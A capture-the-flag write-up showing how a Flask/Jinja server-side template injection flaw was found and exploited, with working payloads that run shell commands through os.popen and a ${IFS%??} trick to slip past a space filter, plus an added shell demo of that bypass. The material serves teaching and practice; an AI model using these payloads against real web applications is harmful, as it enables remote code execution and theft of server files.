VishwaCTF-22 => “Hey Buddy!” (Web)

Shriyans Sudhi
2 min read · Mar 22, 2022

Challenge Info

Description: Hey Buddy, Give me your name I will display your name on my website. Yes exactly, there is nothing in this website.

URL: https://h3y-buddy.vishwactf.com/


Solution

The challenge says that when you enter your name, it will simply display it on the site. Fine, but what is the backend doing with that name? Passing it to a shell script, maybe, or maybe not. Let's find out. Whatever name we enter always comes back in the same fixed format, which suggests the input is being rendered through a template. The vulnerability class to check for is therefore template injection, and since the rendering happens on the backend, more specifically SSTI (Server-Side Template Injection). The basic test for SSTI is the payload {{7*7}}: if the input is evaluated as a template expression instead of being displayed literally, we expect to see 49. So,

And it worked. Next I tried to automate it with tplmap, an SSTI exploitation tool, but it didn't seem to work for me. So I downloaded an SSTI payload list from GitHub and fed it to Burp Intruder. Many payloads returned a 500 error, so I filtered out all 3xx, 4xx and 5xx responses and was left with a few:-

But the most useful one I found was:-

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

This executed "ls" on the filesystem and listed the files, among them flag.txt, the one I was interested in. (The chain works because Flask exposes its configuration object to templates as config; config.__class__.__init__ is a plain Python function, and its __globals__ is the namespace of the flask.config module, which imports os.) Next I tried running "cat flag.txt", but that returned a 500 error. So I replaced the space (" ") with "${IFS%??}". In a POSIX shell, IFS defaults to the three characters space, tab and newline; the ${var%pattern} expansion strips the shortest suffix matching the pattern, and ?? matches the last two characters (tab and newline), leaving exactly one space, which the unquoted expansion then turns into a word separator. The final payload was:-

{{config.__class__.__init__.__globals__['os'].popen('cat${IFS%??}flag.txt').read()}}

This finally gave me the flag:-

Takeaways

  • You can replace the space (" ") with "${IFS%??}" in a payload if the literal space doesn't work.
  • Try different payloads for one attack if the first one doesn't work.
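To make the first takeaway concrete, here is an added shell example (not part of the original writeup and not the challenge's backend). It shows the bytes that "${IFS%??}" actually expands to, and then runs "cat flag.txt" and "cat${IFS%??}flag.txt" through a hypothetical filter that rejects commands containing a literal space. That filter is only a stand-in for whatever caused the challenge's 500 (the real cause is not known), the flag.txt it reads is a constructed sample in a temporary directory, and the example assumes a POSIX sh with IFS left at its default.

```sh
#!/bin/sh
# Added example, not part of the original writeup: why "${IFS%??}" can stand in
# for a space, and how it slips past a filter that rejects literal spaces.
#
# In a POSIX shell IFS defaults to the three characters space, tab, newline.
# "${IFS%??}" removes the shortest suffix matching "??" (any two characters),
# i.e. the tab and the newline, so the expansion yields exactly one space.
# Because the expansion is unquoted, that space then field-splits the word
# "cat${IFS%??}flag.txt" into the two words "cat" and "flag.txt".

# Show the bytes produced by the expansion (octal), so whitespace is visible.
ifs_space() {
    printf '%s' "${IFS%??}" | od -An -to1 | tr -d ' \n'
}

# Hypothetical stand-in for the server side: refuse any command that contains
# a literal space and run everything else through sh. The real challenge
# answered with a 500 for reasons the writeup does not establish; this filter
# only reproduces the observable effect.
run_filtered() {
    cmd=$1
    case "$cmd" in
        *' '*) printf 'ERROR 500'; return 1 ;;
    esac
    sh -c "$cmd"
}

# Run both variants against a constructed flag.txt in a temporary directory
# and report "<result with space>|<result with ${IFS%??}>".
demo_bypass() {
    dir=$(mktemp -d)
    printf 'vishwaCTF{constructed_flag}' > "$dir/flag.txt"   # constructed sample, not the real flag
    # Literal space: rejected by the filter.
    blocked=$(cd "$dir" && run_filtered 'cat flag.txt') || true
    # No literal space in the string, so the filter lets it through; the inner
    # sh expands ${IFS%??} back into a space before running cat.
    flag=$(cd "$dir" && run_filtered 'cat${IFS%??}flag.txt')
    rm -rf "$dir"
    printf '%s|%s\n' "$blocked" "$flag"
}

demo_bypass
```

Running it prints "ERROR 500|vishwaCTF{constructed_flag}": the same command is blocked with a real space and succeeds once the space is spelled as "${IFS%??}". The same idea applies to any filter that keys on the space byte alone, which is why a blocklist on characters is a weak defence against command injection compared to never passing attacker-controlled strings to a shell.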

Get more VishwaCTF-22 writeups here
